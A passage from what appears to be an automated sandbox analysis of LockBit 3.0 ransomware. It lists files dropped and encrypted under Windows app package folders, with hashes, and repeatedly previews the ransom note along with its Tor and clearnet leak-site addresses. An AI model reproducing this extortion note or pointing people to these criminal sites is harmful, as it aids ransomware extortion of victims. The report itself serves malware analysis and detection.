browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\HasRegisteredAsDefaultApp.setting.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):269
                Entropy (8bit):7.211007797426979
                Encrypted:false
                SSDEEP:6:1+ebyj4ppNG6ew3WWyVmtmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:AeHR2WyVAD2VJNAWnM+i+9BVzd
                MD5:974434A2519520F74DB2A277FA21D873
                SHA1:A436284546C1451A35FB9199EDEFF41ACD5B8FAD
                SHA-256:B14E890C3ACC6E02705F2402B005195A62D9A4B826BF8FF8850E96A76389E31A
                SHA-512:7C8A59FCB587FC6526DE4E5AED5066994E084F370B096C2E9BA2C2B227BB2504B5BEC2BA4E6411CE1494C802A97CB0E8AAB821112D350EBA3D1E884453D5DFF2
                Malicious:false
                Preview:|.Df.^>.c-S.G6J7...4P.....`.>4.,..+`d.L....v.....]...2?.-@/..Ih"...O.S..{:.Q....]-.L..s..G.a_].0..1..z.".G.q..3.........C.>.5+upC<,...z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):24840
                Entropy (8bit):7.993915291726054
                Encrypted:true
                SSDEEP:768:Hhxnuhra6qYMTiCoCLx7MQQjKl9HUAMW29:HnAaFYMfD5QjGNV29
                MD5:A533DDC561F5383AB63B9C1C58D46C1D
                SHA1:C906E026926D64DDB6DB2B8A7FE717F0C8445312
                SHA-256:E484DB4BE22755253549ACA0AD6973002ECA23ED5C16F9226BBF938EFBFDDC96
                SHA-512:AC7A92E3A9C9C472186D1734249F31B2C052E1AF8A6D06CCD4AC0B6A1EE6249B8DE6605B697AC93F32FADA865B2BEBC215D143413B002296A977ABF074FF710E
                Malicious:true
                Preview:...H...?.....$:.m...I..u.s.z......S.....*..v........|...Y5^.h..4n.".........]....`....A.TT..o.@...qyqwtL..=E.J..]...z..Z...W2[...!`'Ws>+...e...|...........`-.}.,x.<.g.M....|<"..bF..Lo..5.;r......<..}Y.Y|"s.,L..x.{....y.....;...|....GCL7...K.&.....IA.a.|._!..x...s.K.7....h(.j..-h.cE.e.;.r.W..?E....[.b9>..3..r....'0&<^H..<.|...{`+2...0..&j..UU1...8.MM...pN+..o......_........2....j)U..5Z9....(..~r...S.4..u..../...C.."........t.\..8...Mp..."..D.Pm..Yl...././..h\..L.w..Q.<..J..._P.v.....<B..>........W.:.._G........E......#..a.P!.o.N..5._~-.H#.....G.z..w....f...n...1....V..O7b....`...D.Q...~..Z.T....fu.k..........Mt0|..L..~..."k...........<>..=M.4}.Y....~.m#&...)F+....D'.FN..K.....e:~.i.....a.._......:...>...e.].N.X......kO1.r.......'.....WrK...x.....:.A...U.*[03.S..@..o..jT..q..B.E.2y...k:..).0y...c.q.5.B.....ME..h.M..j....5.[.-...^.....+.F8..t.A.....d...vs......eq.P...X.w^DS..w/t`E......'}..k=`. ..y...x.(....v...`aJk...V.K.....}4.|..D'._.

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\TransportIdList.setting.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):261
                Entropy (8bit):7.199477224597879
                Encrypted:false
                SSDEEP:6:EvzchsTZNlgxmqmkuPqhPCcgdsc7VmXmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:EvzchslhdkuPqCcgdUXD2VJNAWnM+i+j
                MD5:C8D2EA9E4E5D592B400CBAA502B5B6E7
                SHA1:30C23A7F0F53B007B2EFDC0BF7A8DFB73BBC5B84
                SHA-256:D79AFF69E84C24556D6047C1F73854DE827964E272C98036051904E0876C956F
                SHA-512:181798A86EB4CAB6C3538EE3F2AFCB2543FB13D9B8F1FE021455A377F73255732A7E5FDDFFFEA3F33163CA9FAC5A8919C23A23823C560C68BF5CD75572F02E83
                Malicious:false
                Preview:L....^-.q-o.Q6]7...4......._..G....=.te;.....C.:.=...1?..C/...j.O.:`.;..J.G......Yx..i.Uj....!A...t.7....=/(m<7.yH.@.}S{.D.Q.z..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.980002819747142
                Encrypted:false
                SSDEEP:192:3nm541HRMOODuue+YsO8E6p2ed0sN/XB91dWWQznLtrEGBNrPo:3n44ZiOouP+U8E6Uk06/XBbdWWWnhr/Y
                MD5:B4906AE0EA1BBB76AD0AEB5B717E1C7E
                SHA1:69AC70F634BF9AA354D51B5CA85A96A63A617B07
                SHA-256:09A410B43F711BFF4706E957535F3B79A2477D7071B8468C939730A3088DEB96
                SHA-512:573091A4EDAF472383CD445FF547F3726F8786713A781DE94C972D69A2632BE2F5ED8E92084661F3E483A2672CFB70CDE32551FB56A39F02A074BCFFA0E29156
                Malicious:false
                Preview:>Q.........G.4uM.^..i.e..Q.r..0..W...5}......7^..e....%..i.~..-?..!.1..}b.).x.D..8..7......Q.g...4.Y.^........}..>.&._.HfI._,...&N.18V%..f~j...U....}.w.0i..l(.w.i.....t..e..S1..6........m.s.)a.u...q...')..kg....S.B.GgJ......g.w......1V..-..*..$....m.@.WK.OL.I.N.....Q.......Jm.C.?J...E;.F..F..v##.. M"(..?..s...*.Y..y.......b.T..r..g..C.;..I.F_._...[.p.q...?....M....]V6...:..<.X.<d.4..YD.j;.`...A.0y..(.lTd@L..5mb.b"..... u...=..~[......p...q7'...^..<vD7...G.*c...'..Hd.!%&...N..y.\,..eZ.8.B.Y.j...^.?.}f..w..R.....'.....*....{......qEO...l#..a....@.>T.w.2Bq.)S..W.C......-....5.........Q.}..R...l./0.H....s..(..7||.z:.}W...K.K.k..^Vs.k... ...{^..]...........X.y!.....k.)...]|E(.J'..5q......-U...q.?.....)I..m.L.=..U.,~.sk.@...s.~a..Y..I....Eu.V......D.:j.?,....2NT..9..,.Ki..7!X-......6ky... .N..Km......"b..4.Ir#..^..3k.l..9.....W.4.....1=...M.. .%...~.J.Ue.F.....mg....M.....L.z.........dY.k.%..u.J....E9(.\.f..V..@q3?...[.5R....q`.U......M......?..

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
